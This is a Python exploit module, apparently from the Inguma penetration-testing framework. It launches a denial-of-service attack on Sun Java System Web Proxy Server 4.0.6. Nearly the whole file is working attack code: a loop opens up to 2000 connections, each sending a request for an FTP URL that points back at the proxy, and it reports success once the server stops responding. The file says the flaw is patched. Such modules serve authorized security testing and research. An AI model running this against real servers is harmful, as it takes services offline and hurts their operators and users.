#!/usr/bin/python

##      CSunJavaProxyDos.py
#       
#       Copyright 2010 Joxean Koret <joxeankoret@yahoo.es>
#       
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#       
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#       
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.

import sys
import time
import socket

from lib.libexploit import CIngumaModule

"""
Tested against Sun Java System Web Proxy Server 4.0.6 B09/05/2007
"""

name = "sunproxydos"
brief_description = "Sun Java System Web Proxy DOS"
type = "exploit"
affects = ["Sun Java System Web Proxy Server 4.0.6"]
description = """
Sun Java System Web Proxy Server is vulnerable to a remote 
denial of service condition while handling ftp queries that points
to itself, i.e., the proxy's address.

Obviously, it's a brute dos exploit.
"""
patch = "Fixed"
category = "dos"
discoverer = "Joxean Koret"
author = "Joxean Koret <joxeankoret@yahoo.es>"

class CSunJavaProxyDos(CIngumaModule):
    target = ""  # Main target
    port = 8080
    waitTime = 0
    timeout = 1
    exploitType = 1
    services = {}
    results = {}
    dict = None
    interactive = True

    def help(self):
        print "target = <target host>"
        print "port = <port>"

    def run(self):
        if self.target == "" or self.target == None:
            self.target = "localhost"
        
        if self.port == 0 or self.port == None:
            self.port = 8080
        
        self.remoteDos()

    def remoteDos(self):
        socket.setdefaulttimeout(10) # Set the timeout to 10 seconds

        try:
            print "[+] Launching attack against %s:%d" % (self.target, self.port)

            aTime = time.time()
            for i in range(1,2000): # Commonly, 1035 queries are sufficient enough
                    if time.time() - aTime > 5: # More than XX seconds waiting, it worked
                        print
                        print "[+] Exploit works!"
                        return True

                    aTime = time.time()
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect((self.target, self.port))
                    s.send("GET ftp://user:pass@localhost:%s HTTP/1.0\r\n\r\n" % int(self.port))
                    s.close()
                    sys.stdout.write("\b"*20 + "--> Connection #%d" % i)
                    sys.stdout.flush()
        except KeyboardInterrupt:
            print
            print "Aborted."

            return False
        except socket.timeout:
            if i > 50: # Count as a valid DOS condition if we sent at least 50 packets
                print
                print "[+] Exploit works!"
                return True
            else:
                raise

    def printSummary(self):
        pass
